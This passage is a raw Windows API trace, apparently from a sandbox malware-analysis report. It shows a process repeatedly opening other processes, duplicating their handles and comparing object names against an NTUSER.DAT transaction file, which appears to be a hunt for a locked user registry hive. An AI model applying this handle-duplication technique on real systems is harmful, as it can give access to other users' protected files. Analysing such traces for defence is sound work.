hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.000] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.000] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.001] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.001] CloseHandle (hObject=0x670) returned 1 [0154.001] CloseHandle (hObject=0x680) returned 1 [0154.001] CloseHandle (hObject=0x62c) returned 1 [0154.001] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.001] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.002] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.002] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.003] CloseHandle (hObject=0x670) returned 1 [0154.003] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -8 [0154.003] CloseHandle (hObject=0x680) returned 1 [0154.003] CloseHandle (hObject=0x62c) returned 1 [0154.003] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.003] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.003] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.003] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.004] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.004] CloseHandle (hObject=0x670) returned 1 [0154.004] CloseHandle (hObject=0x680) returned 1 [0154.004] CloseHandle (hObject=0x62c) returned 1 [0154.004] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.004] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.004] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.005] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.006] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.006] CloseHandle (hObject=0x670) returned 1 [0154.006] CloseHandle (hObject=0x680) returned 1 [0154.006] CloseHandle (hObject=0x62c) returned 1 [0154.006] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.006] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.006] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.006] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.007] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.007] CloseHandle (hObject=0x670) returned 1 [0154.007] CloseHandle (hObject=0x680) returned 1 [0154.007] CloseHandle (hObject=0x62c) returned 1 [0154.007] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0154.007] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.008] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.009] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.009] CloseHandle (hObject=0x670) returned 1 [0154.009] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.009] CloseHandle (hObject=0x680) returned 1 [0154.009] CloseHandle (hObject=0x62c) returned 1 [0154.009] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0154.009] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.010] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.010] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.010] CloseHandle (hObject=0x670) returned 1 [0154.010] CloseHandle (hObject=0x680) returned 1 [0154.011] CloseHandle (hObject=0x62c) returned 1 [0154.011] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0154.011] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.011] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.011] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.012] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.012] CloseHandle (hObject=0x670) returned 1 [0154.012] CloseHandle (hObject=0x680) returned 1 [0154.012] CloseHandle (hObject=0x62c) returned 1 [0154.012] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0154.012] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.020] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.020] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.020] CloseHandle (hObject=0x670) returned 1 [0154.020] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0154.020] CloseHandle (hObject=0x680) returned 1 [0154.021] CloseHandle (hObject=0x62c) returned 1 [0154.021] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0154.021] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x238, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.021] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.022] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.022] CloseHandle (hObject=0x670) returned 1 [0154.022] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.022] CloseHandle (hObject=0x680) returned 1 [0154.022] CloseHandle (hObject=0x62c) returned 1 [0154.022] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x62c [0154.022] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.023] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.024] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.024] CloseHandle (hObject=0x670) returned 1 [0154.024] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.024] CloseHandle (hObject=0x680) returned 1 [0154.024] CloseHandle (hObject=0x62c) returned 1 [0154.024] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x62c [0154.024] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x68, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.025] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.025] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.025] CloseHandle (hObject=0x670) returned 1 [0154.025] CloseHandle (hObject=0x680) returned 1 [0154.025] CloseHandle (hObject=0x62c) returned 1 [0154.025] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x32c) returned 0x62c [0154.025] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.026] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.027] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.027] CloseHandle (hObject=0x670) returned 1 [0154.027] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.027] CloseHandle (hObject=0x680) returned 1 [0154.027] CloseHandle (hObject=0x62c) returned 1 [0154.027] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x32c) returned 0x62c [0154.027] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.027] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.028] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.028] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.028] CloseHandle (hObject=0x670) returned 1 [0154.028] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.029] CloseHandle (hObject=0x680) returned 1 [0154.029] CloseHandle (hObject=0x62c) returned 1 [0154.029] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6a4) returned 0x62c [0154.029] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.029] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.029] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.030] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.030] CloseHandle (hObject=0x670) returned 1 [0154.030] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.030] CloseHandle (hObject=0x680) returned 1 [0154.030] CloseHandle (hObject=0x62c) returned 1 [0154.030] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6a4) returned 0x62c [0154.030] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.031] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.033] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.033] CloseHandle (hObject=0x670) returned 1 [0154.033] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0154.033] CloseHandle (hObject=0x680) returned 1 [0154.033] CloseHandle (hObject=0x62c) returned 1 [0154.033] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x62c [0154.033] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.034] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.035] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.035] CloseHandle (hObject=0x670) returned 1 [0154.035] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.035] CloseHandle (hObject=0x680) returned 1 [0154.035] CloseHandle (hObject=0x62c) returned 1 [0154.035] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x62c [0154.035] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.035] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.036] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.036] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.036] CloseHandle (hObject=0x670) returned 1 [0154.036] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0154.036] CloseHandle (hObject=0x680) returned 1 [0154.037] CloseHandle (hObject=0x62c) returned 1 [0154.037] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x62c [0154.037] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.037] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.037] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.038] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.038] CloseHandle (hObject=0x670) returned 1 [0154.038] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.038] CloseHandle (hObject=0x680) returned 1 [0154.038] CloseHandle (hObject=0x62c) returned 1 [0154.038] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x62c [0154.038] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.039] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.039] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.040] CloseHandle (hObject=0x670) returned 1 [0154.040] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.040] CloseHandle (hObject=0x680) returned 1 [0154.040] CloseHandle (hObject=0x62c) returned 1 [0154.040] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x62c [0154.040] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.040] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.041] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.041] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.041] CloseHandle (hObject=0x670) returned 1 [0154.041] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.041] CloseHandle (hObject=0x680) returned 1 [0154.042] CloseHandle (hObject=0x62c) returned 1 [0154.042] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x62c [0154.042] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.042] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.043] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.043] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.043] CloseHandle (hObject=0x670) returned 1 [0154.043] _wcsicmp (_Str1="\\Google", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -7 [0154.043] CloseHandle (hObject=0x680) returned 1 [0154.043] CloseHandle (hObject=0x62c) returned 1 [0154.043] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x62c [0154.044] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.044] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.045] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.045] CloseHandle (hObject=0x670) returned 1 [0154.045] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.045] CloseHandle (hObject=0x680) returned 1 [0154.045] CloseHandle (hObject=0x62c) returned 1 [0154.045] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x62c [0154.045] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.046] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.047] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.047] CloseHandle (hObject=0x670) returned 1 [0154.047] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0154.047] CloseHandle (hObject=0x680) returned 1 [0154.047] CloseHandle (hObject=0x62c) returned 1 [0154.047] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x62c [0154.047] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.048] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.048] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.048] CloseHandle (hObject=0x670) returned 1 [0154.048] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.048] CloseHandle (hObject=0x680) returned 1 [0154.049] CloseHandle (hObject=0x62c) returned 1 [0154.049] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x62c [0154.049] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.050] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.051] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.051] CloseHandle (hObject=0x670) returned 1 [0154.052] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.052] CloseHandle (hObject=0x680) returned 1 [0154.052] CloseHandle (hObject=0x62c) returned 1 [0154.052] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x174) returned 0x62c [0154.052] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.052] CreateThread 